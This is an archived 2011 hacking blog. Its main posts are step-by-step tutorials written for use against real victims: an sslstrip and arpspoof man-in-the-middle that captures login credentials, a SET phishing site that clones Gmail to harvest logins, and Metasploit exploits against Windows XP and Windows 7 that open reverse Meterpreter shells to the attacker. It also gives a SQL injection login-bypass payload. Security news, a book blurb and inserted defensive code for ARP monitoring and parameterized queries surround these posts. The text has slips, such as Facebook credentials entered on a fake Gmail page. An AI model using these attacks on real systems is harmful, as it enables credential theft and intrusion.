Saturday, 24 December 2011

Man-in-the-middle attack using sslstrip


SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements
For sslstrip (on BackTrack 5):
  • Python >= 2.5 (apt-get install python)
  • The Python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

Step 1: Open a terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

This flips your machine into IP forwarding mode.


Step 2: Now set up iptables to redirect HTTP traffic to sslstrip with this command:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

This redirects all traffic arriving on port 80 to port 7777.


Step 3: Now run sslstrip.

Path: /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <txt file name>

In my case:

./sslstrip.py -l 7777 -w mitm

The -w option writes all captured data to a single text file.



Step 4: Do not close this terminal. Open a new terminal and run arpspoof to sniff data from the victim PC on the network.

Run arpspoof to convince the network that its traffic should be sent to you:


arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case 

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1


On the victim machine

If the command succeeded, the victim PC's ARP table has been altered by arpspoof, so you can now sniff the victim's data.

When the victim accesses his or her Gmail account, the Gmail site that opens is not the real one, although it looks exactly like it.
The only difference: the real Gmail site is served over HTTPS, while this one is plain HTTP.

When the victim enters his or her Facebook credentials into this fake Gmail page, arpspoof sniffs them and sslstrip reads them and writes them to a text file in your /pentest/web/sslstrip directory.

In my case the text file is named mitm.txt.


You now have the victim's Facebook credentials. :D
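The arpspoof step above works by answering ARP requests for the gateway with the attacker's MAC. As an added example (not code from the original post nor from the arpspoof or sslstrip projects), here is a small Python monitor that replays a constructed sample of ARP replies for the post's scenario and reports the two symptoms a defender can alert on: a known IP changing its MAC, and one MAC answering for several IPs. All addresses below are constructed.

```python
"""ARP poisoning monitor (added example, not part of the original post).

A host or a passive sniffer sees ARP replies as (sender IP, sender MAC) pairs.
arpspoof answers for the gateway with the attacker's MAC, which leaves two
traces: a known IP suddenly maps to a different MAC, and one MAC ends up
claiming more than one IP. SAMPLE_REPLIES is a constructed sequence for the
post's scenario (gateway 192.168.1.1, victim 192.168.1.102); the MACs are
made-up values.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class ArpReply:
    sender_ip: str
    sender_mac: str


@dataclass
class ArpMonitor:
    """Remembers the first MAC learned per IP and reports later disagreements."""
    seen: dict = field(default_factory=lambda: defaultdict(set))  # IP -> {MACs}
    baseline: dict = field(default_factory=dict)                  # IP -> first MAC
    alerts: list = field(default_factory=list)                    # findings

    def observe(self, reply: ArpReply) -> bool:
        """Record one reply; return True if it contradicts the baseline."""
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        self.seen[ip].add(mac)
        first = self.baseline.setdefault(ip, mac)
        if mac != first:
            self.alerts.append(f"{ip}: expected {first}, got {mac}")
            return True
        return False

    def macs_claiming_multiple_ips(self) -> dict:
        """MAC -> sorted list of IPs, for every MAC that answered for >1 IP."""
        by_mac = defaultdict(set)
        for ip, macs in self.seen.items():
            for mac in macs:
                by_mac[mac].add(ip)
        return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed sample: legitimate replies first, then the poisoning starts.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "00:11:22:33:44:01"),    # real gateway
    ArpReply("192.168.1.102", "00:11:22:33:44:02"),  # victim
    ArpReply("192.168.1.103", "00:11:22:33:44:03"),  # attacker's own address
    ArpReply("192.168.1.1", "00:11:22:33:44:03"),    # gateway now claimed by attacker MAC
    ArpReply("192.168.1.1", "00:11:22:33:44:03"),    # arpspoof keeps re-sending
]


def analyse(replies) -> ArpMonitor:
    """Feed every reply to a fresh monitor and return it for inspection."""
    mon = ArpMonitor()
    for reply in replies:
        mon.observe(reply)
    return mon


if __name__ == "__main__":
    mon = analyse(SAMPLE_REPLIES)
    for line in mon.alerts:
        print("ALERT", line)
    for mac, ips in mon.macs_claiming_multiple_ips().items():
        print("MAC", mac, "answers for", ", ".join(ips))
```

A static ARP entry for the gateway, or Dynamic ARP Inspection on the switch, stops the poisoning itself; HSTS is what stops the HTTPS-to-HTTP rewrite sslstrip performs once traffic has been diverted.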

[Video tutorial]

If you have any questions, feel free to ask. :D




Wednesday, 21 December 2011

Social Engineer Toolkit (SET) - Credential Harvester Attack (hack Gmail, Facebook, Twitter accounts)


SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

Requirements

1. BackTrack 5

Social Engineer Toolkit (SET)-Credential Harvester Attack 

Step 1: First open a terminal and change to the following path:

cd /pentest/exploit/set

then press Enter, and type ./set to open the Social Engineer Toolkit.

It looks like this:






Step 2: Select option 1: Social-Engineering Attacks from the SET menu.

A new menu now opens in SET.




Step 3: Select option 2: Website Attack Vectors.

The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.

A new menu now opens in SET.




Step 4: Select option 3: Credential Harvester Attack Method.

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

A new menu now opens in SET.




Step 5: Select option 2: Site Cloner.

A new prompt now opens in SET.

Step 6: Now enter the target URL you want to clone, e.g. https://gmail.com, then press Enter.


The Credential Harvester is now running on port 80, and the attacker PC is ready.

The URL you give to the victim is http://<your IP address>/

in my case

  
http://192.168.1.103/


On the victim PC

When the victim enters the URL http://192.168.1.103/, the browser opens what looks like the Gmail website, but it is the fake site generated by SET.




When the victim enters his or her Gmail credentials into this fake website, the fake site sends the credentials to the attacker PC.








You now have the victim's Gmail credentials. :D

[Video tutorial]


If you want to learn how to use the Credential Harvester attack over the Internet, click here (YouTube video in HD).

If you have any questions, feel free to ask. :D



Tuesday, 20 December 2011

How to hack windows xp (sp1,sp2,sp3) using metasploit

In this article I will show you how to use the ms08_067_netapi exploit against an unpatched Windows XP machine to gain access to it. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption"; it helps bypass NX on various operating systems and service packs. Before we jump into the actual exploitation process, I would suggest you take some time to look at the exploit code here.

Requirements

1. BackTrack 5
2. Windows XP 

How to hack windows xp using metasploit


Step 1 - First of all, turn on your BackTrack 5 virtual machine.

Step 2 - Next, in your console type "msfconsole". This loads the Metasploit Framework.

Step 3 - Next, type "use windows/smb/ms08_067_netapi" in the console.

Step 4 - Now that the exploit is selected, you need to enter RHOST, which refers to the IP address of the victim. You can get the Windows host's IP by issuing the "ipconfig" command in its command prompt.

Step 5 - Once the exploit is set up, it's time to set a payload. In this case we will use "set payload windows/meterpreter/reverse_tcp" in the shell. Next you need to set the proper LHOST (the attacker's IP address) by issuing the command "set lhost <IP address>".

Step 6 - Next, issue the command "show options" to check that everything is set up correctly.

Step 7 - Once you are done with that check, just type "exploit" in the console.

If the exploit succeeds, you get a Meterpreter shell on your BackTrack PC.



[Video tutorial]


If you have any questions, feel free to ask. :D


Tuesday, 13 December 2011

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)


Hack Windows 7
Requirements:

1. Metasploit Framework
2. Operating system (I recommend Linux or BackTrack 5)

Step By Step :

1. Open msfconsole and find the java_signed_applet exploit with the command "search java_signed_applet". If you can't find it, update your Metasploit Framework to a newer version with the msfupdate command. If the exploit is available, continue as in the picture below.


use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit
set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp Meterpreter payload to connect back to our machine

2. We need to set some required options to make the attack succeed. To view the available options, type "show options".



set srvhost 192.168.1.103 ---> host that serves the exploit
set srvport 80 ---> I chose 80 because it works well for social engineering, especially via a website
set uripath / ---> the URL format to send to the victim (http://192.168.1.103)
set lhost 192.168.1.103 ---> connect-back address for the payload when the attack succeeds
set lport 443 ---> port used to connect back to our machine


3. exploit

The URL you give to the victim is http://192.168.1.103/

4. When the victim opens that link in their browser, a dialog box immediately warns that the digital signature cannot be verified, as in the picture below.

5. The victim opens the malicious URL and clicks RUN.

Press CTRL + C to stop the process, or run "sessions -l" directly to view the active sessions.

You now have a Meterpreter shell on your BackTrack PC.



[Video tutorial]




Sunday, 27 November 2011

What is SQL injection?


SQL Injection: What is it?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

SQL Injection: An In-depth Explanation
Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.
SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.
Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.
These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

Example of a SQL Injection Attack

Here is a sample basic HTML form with two inputs, login and password.

<form method="post" action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for the login.asp to work is by building a database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'

If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause.

The 'x'='x' part guarantees to be true regardless of what the first part contains.

This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!
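To make the two-component clause concrete, here is the login query from the post built both ways, as an added example that is not code from the original article. A throwaway in-memory SQLite table stands in for the post's logins table; its single row is constructed sample data. login_concat() splices the input into the statement the way the post's login.asp does, while login_param() passes the same input as bound parameters.

```python
"""The post's login query, concatenated versus parameterized (added example).

The logins table and its one row are constructed sample data. With the
post's password anything' OR 'x'='x, the concatenated statement becomes
    ... WHERE username = 'Joe' AND password = 'anything' OR 'x'='x'
where AND binds tighter than OR, so the trailing 'x'='x' makes the whole
WHERE clause true. With placeholders the quote is just a character inside
the bound value and the statement keeps its original shape.
"""
import sqlite3

ATTACK_PASSWORD = "anything' OR 'x'='x"   # the post's example input


def make_db() -> sqlite3.Connection:
    """Create an in-memory table shaped like the post's logins table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample row; a real table would hold a password hash, not plaintext.
    conn.execute(
        "INSERT INTO logins (username, password) VALUES ('Joe', 'correct horse')")
    conn.commit()
    return conn


def build_concat_sql(username: str, password: str) -> str:
    """Return the statement the post's login.asp would build from raw input."""
    return ("SELECT id FROM logins WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_concat(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable: executes the concatenated text. Returns matched id or None."""
    row = conn.execute(build_concat_sql(username, password)).fetchone()
    return row[0] if row else None


def login_param(conn: sqlite3.Connection, username: str, password: str):
    """Safe: the driver binds values separately from the SQL text."""
    sql = "SELECT id FROM logins WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", build_concat_sql("Joe", ATTACK_PASSWORD))
    print("concatenated login as Joe with attack password ->",
          login_concat(db, "Joe", ATTACK_PASSWORD))   # 1: bypassed
    print("parameterized login as Joe with attack password ->",
          login_param(db, "Joe", ATTACK_PASSWORD))    # None: rejected
```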

SQL INJECTION CHEAT SHEET

Live Example of a SQL Injection Attack

http://www.youtube.com/watch?v=WGkntart6WI&feature=related

Sunday, 20 November 2011

Maharashtra Highway Police website hacked


Not only international law enforcement and police are under hackers' attack; even our local police websites and databases become victims of breaches almost daily. A hacker using the name "powerin10" has taken responsibility for hacking the Maharashtra Highway Police website. A mirror of this hack is available here. The hacker is a member of Bangladesh Cyber Army.

Hackers destroyed a pump used by a US water utility



Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment. Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Friday, 18 November 2011

US military's offensive operations in cyberspace to shoot Hackers


The US military is now legally in the clear to launch offensive operations in cyberspace, the commander of the US Strategic Command has said. The Pentagon has just sent a report to Congress where it says that it has the right to retaliate with military force against a cyber attack.


Air Force General Robert Kehler said in the latest sign of quickening U.S. military preparations for possible cyber warfare that "I do not believe that we need new explicit authorities to conduct offensive operations of any kind".




US Strategic Command is in charge of a number of areas for the US military, including space operations (like military satellites), cyberspace concerns, 'strategic deterrence' and combating WMDs.


"When warranted, we will respond to hostile acts in cyberspace as we would to any other threat to our country," the DoD said in the report. "All states possess an inherent right to self-defense, and we reserve the right to use all necessary means – diplomatic, informational, military, and economic – to defend our nation, our allies, our partners, and our interests."


This means that if anyone carries out a decent attack on the Pentagon website, the Navy Seals will land on his roof, run through his house shooting anything that moves and bury the body at sea. US security agencies are also training a crack team of highly skilled cyber forensics experts and are working with international partners to share information about cyber threats, including malicious code and the people behind it, it said.

Patches Released for BIND Denial-of-service Vulnerability




There's a new vulnerability in the popular BIND name server software that is causing various versions of the application to crash unexpectedly after logging a certain kind of error. The Internet Systems Consortium (ISC), an organization that maintains several software products critical for Internet infrastructure, has released a patch for an actively exploited denial-of-service vulnerability in the widely used BIND DNS server.


The Internet Systems Consortium (ISC) has described the problem as follows:
An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers with an assertion failure...
Affected servers crashed after logging an error in query.c with the following message: "INSIST(! dns_rdataset_isassociated(sigrdataset))"
More details are available in their advisory.


As of this posting, ISC had not revealed the underlying problem, but said the patches would prevent the servers from crashing. The flaw affects BIND 9.4-ESV, 9.6-ESV, 9.7.x, and 9.8.x. The patch basically ensures that the cache doesn't return the anomalous data and prevents the server from crashing. ISC officials had not responded to media inquiries as of this posting, and it was unclear whether the flaw was just wreaking mayhem on the servers, or if an actual exploit was causing it.


Security intelligence firm Rapid7 said the first attack was discovered at the National Weather Service, with the following 89 discoveries of the attack on US universities. "BIND 9 is the most widely used DNS server on the internet today... Gone unchecked, this attack could potentially affect nearly the entire internet," said Matt Barrett, senior solutions architect at Rapid7. A temporary patch has already been released.

Thursday, 17 November 2011

Worlds first windows 8 Bootkit to be released at MalCon




It is amazing how fast security measures are bypassed by hackers. It seems Windows 8 is now Malconed! Peter Kleissner has created the world's first Windows 8 bootkit, which is planned to be released in India at the International Malware Conference MalCon.

An independent programmer and security analyst, Peter worked for an anti-virus company from 2008 to 2009 and was a speaker at the Black Hat and Hacking at Random technical security conferences. While his main fields are Windows security and analysis of new malware, his recent important projects include the development of the Stoned Bootkit, a research project to subvert the Windows security model.

A bootkit is built upon the following broad parts:
  • Infector
  • Bootkit
  • Drivers
  • Plugins (the payload)

And as Peter puts it, those parts are easy to split up in a criminal organization: Teams A-D work on the different parts. If you do it right, Team D (the payload writers) needs no internal knowledge of the bootkit! Peter's research website: http://www.stoned-vienna.com/

According to the MalCon website, Peter's travel is still not confirmed because of visa issues; however, there is a chance that the presentation will be done over video, or that a speaker will step in on Peter's behalf and release it at MalCon.

Wednesday, 16 November 2011

Site Point - The Principles of Beautiful Web Design By Jason Beaird ( Second Edition )



Publisher: SitePoint
Published: November 15, 2010
Pages: 190
More info:
http://www.sitepoint.com/books/design2/
and
http://jasongraphix.com/journal/second-edition/




Many non-designers believe that they’re unable to create visually pleasing websites because they didn’t go to art school, or that they lack creative flair.

Thankfully, this isn’t true.

There are certain design maxims and techniques anyone can learn and apply to ensure that their website is not only functional, but sexy too. No art school required.

Whether you want to improve the look of an ordinary website or learn a new set of skills, The Principles of Beautiful Web Design, Second Edition will teach you good design fundamentals, ensuring that you avoid making any rookie mistakes.

The second edition of The Principles of Beautiful Web Design has been expanded and revised, and is illustrated with full-color examples. It’s an easy-to-follow guide that will lead you through the process of creating great designs from start to finish.

You'll learn how to:
apply color effectively and develop killer color schemes
construct practical layout foundations using whitespace and grids
use textures – point, line, shape, volume, depth, and pattern
master the art of typography to make dull websites dazzle
choose, edit, and position imagery effectively
design confidently for mobile devices
see into the future of web fonts, including @font-face

About Jason

 Jason Beaird is a designer and front-end developer with over ten years of experience working on a wide range of award-winning web projects. With a background in graphic design and a passion for web standards, he’s always looking for accessible ways to make the Web a more beautiful place. When he’s not pushing pixels in Photoshop or tinkering with markup, Jason loves sharing his passion for the Web with others.




Table of contents (page numbers refer to the book):

Chapter 1 Layout and Composition (p. 1)
  The Design Process (p. 2)
  Discovery (p. 2)
  Exploration (p. 4)
  Implementation (p. 4)
  Defining Good Design (p. 5)
  Web Page Anatomy (p. 8)
  Grid Theory (p. 10)
  The Rule of Thirds (p. 11)
  960 Grid System (p. 13)
  Balance (p. 15)
  Symmetrical Balance (p. 15)
  Asymmetrical Balance (p. 16)
  Unity (p. 19)
  Proximity (p. 19)
  Repetition (p. 20)
  Emphasis (p. 22)
  Placement (p. 22)
  Continuance (p. 22)
  Isolation (p. 23)
  Contrast (p. 23)
  Proportion (p. 24)
  Bread-and-butter Layouts (p. 25)
  Left-column Navigation (p. 26)
  Right-column Navigation (p. 27)
  Three-column Navigation (p. 27)
  Finding Inspiration (p. 28)
  Using a Morgue File (p. 29)
  Fresh Trends (p. 30)
  Navigationless Magazine Style (p. 30)
  Expansive Footers (p. 31)
  Bare-bones Minimalism (p. 32)
  Resizing: Fixed, Fluid, or Responsive Layouts (p. 32)
  Fixed Width (p. 33)
  Fluid Width (p. 33)
  An Alternative: Responsive Layouts (p. 34)
  Screen Resolution (p. 36)
  Application: Southern Savers (p. 38)
  Getting Started (p. 39)
Chapter 2 Color (p. 43)
  The Psychology of Color (p. 43)
  Color Associations (p. 44)
  Color Temperature (p. 50)
  Chromatic Value (p. 51)
  Saturation (p. 51)
  Color Theory 101 (p. 52)
  Red, Yellow, and Blue, or CMYK (p. 53)
  The Scheme of Things (p. 55)
  A Monochromatic Color Scheme (p. 56)
  An Analogous Color Scheme (p. 59)
  A Complementary Color Scheme (p. 62)
  Split-complementary, Triadic, and Tetradic (p. 67)
  Other Variants (p. 69)
  Creating a Palette (p. 70)
  Hexadecimal Notation (p. 70)
  Color Tools and Resources (p. 72)
  Color Scheme Designer 3 (p. 72)
  Adobe Kuler (p. 73)
  COLOURlovers (p. 74)
  Color Stream iPhone App (p. 74)
  Pictaculous (p. 75)
  Colour Contrast Check (p. 76)
  Application: the Color of Coupons (p. 77)
Chapter 3 Texture (p. 81)
  Point (p. 82)
  Line (p. 83)
  Shape (p. 85)
  Rounded Corners (p. 87)
  Rotation (p. 89)
  Shapes and Layout (p. 90)
  Volume and Depth (p. 92)
  Perspective (p. 92)
  Proportion (p. 93)
  Light and Shadow (p. 94)
  Pattern (p. 97)
  Building Texture (p. 102)
  Aged, Weathered, Worn, and Nostalgic Style (p. 102)
  Clean and Grainy (p. 105)
  Handcrafted Scrapbook (p. 107)
  Whimsical Cartoon Style (p. 109)
  Minimal Texture (p. 111)
  Starting Your Own Textural Trends (p. 112)
  Application: Clipping and Saving (p. 113)
Chapter 4 Typography (p. 117)
  Taking Type to the Web (p. 119)
  Text Image Replacement (p. 121)
  Web Fonts with @font-face (p. 122)
  Self-hosted Web Fonts (p. 123)
  Web Font Services (p. 124)
  sIFR and Cufón (p. 125)
  Anatomy of a Letterform (p. 126)
  Text Spacing (p. 128)
  Horizontal Spacing (p. 128)
  Vertical Spacing (p. 130)
  Text Alignment (p. 130)
  Typeface Distinctions (p. 132)
  Serif Fonts (p. 133)
  Sans-serif Fonts (p. 135)
  Handwritten Fonts (p. 137)
  Fixed-width Fonts (p. 138)
Novelty Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Dingbat Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142
Finding Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Free Font Galleries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Commercial Font Galleries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Individual Artists and Foundries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Choosing the Right Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145
Setting Font Size and Line Height . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Using Punctuation and Special Characters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Application: The Fine Print . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
Chapter 5 Imagery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
What to Look For . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Legitimate Image Sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Take It or Make It . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Stock Photography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Getting Professional Help . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
How Not to Impress . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Google Ganking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Hotlinking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Clipart . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
Creative Cropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Photoshop Adjustments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
File Formats and Resolutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Creative Image Treatments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Using Images to Enhance Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Using Pure CSS to Enhance Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Application: the Fine Print . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Onward and Upward . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188



Stuxnet 3.0 possibly to be released at MalCon?




Malware coders and security researchers are increasingly looking at the MalCon malware convention to show off their latest creations and research. We were pretty shocked to see in a Twitter update today from MalCon that one of the shortlisted research paper submissions is on possible features of Stuxnet 3.0.


While this may be just a discussion and not a release, it is interesting to note that the speaker presenting the paper, Nima Bagheri, is from Iran.


To refresh your memory, Stuxnet is a computer worm discovered in June 2010. It targets Siemens industrial software and equipment running Microsoft Windows. While it is not the first time that hackers have targeted industrial systems, it is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit.


What is alarming is the recent discovery (on 1 September 2011) of a new worm thought to be related to Stuxnet. The Laboratory of Cryptography and System Security (CrySyS) of the Budapest University of Technology and Economics analyzed the malware, naming the threat Duqu. Symantec, based on this report, continued the analysis of the threat, calling it "nearly identical to Stuxnet, but with a completely different purpose", and published a detailed technical paper. The main component used in Duqu is designed to capture information such as keystrokes and system information. The exfiltrated data may be used to enable a future Stuxnet-like attack.


The research paper abstract discusses rootkit features, and the authors will likely give a demonstration at MalCon of new research related to hiding rootkits and advanced Stuxnet-like malware.


Released or not, MalCon certainly leaves plenty of room for imagining the future of computing, and we hope we never end up living Die Hard 4.0 someday.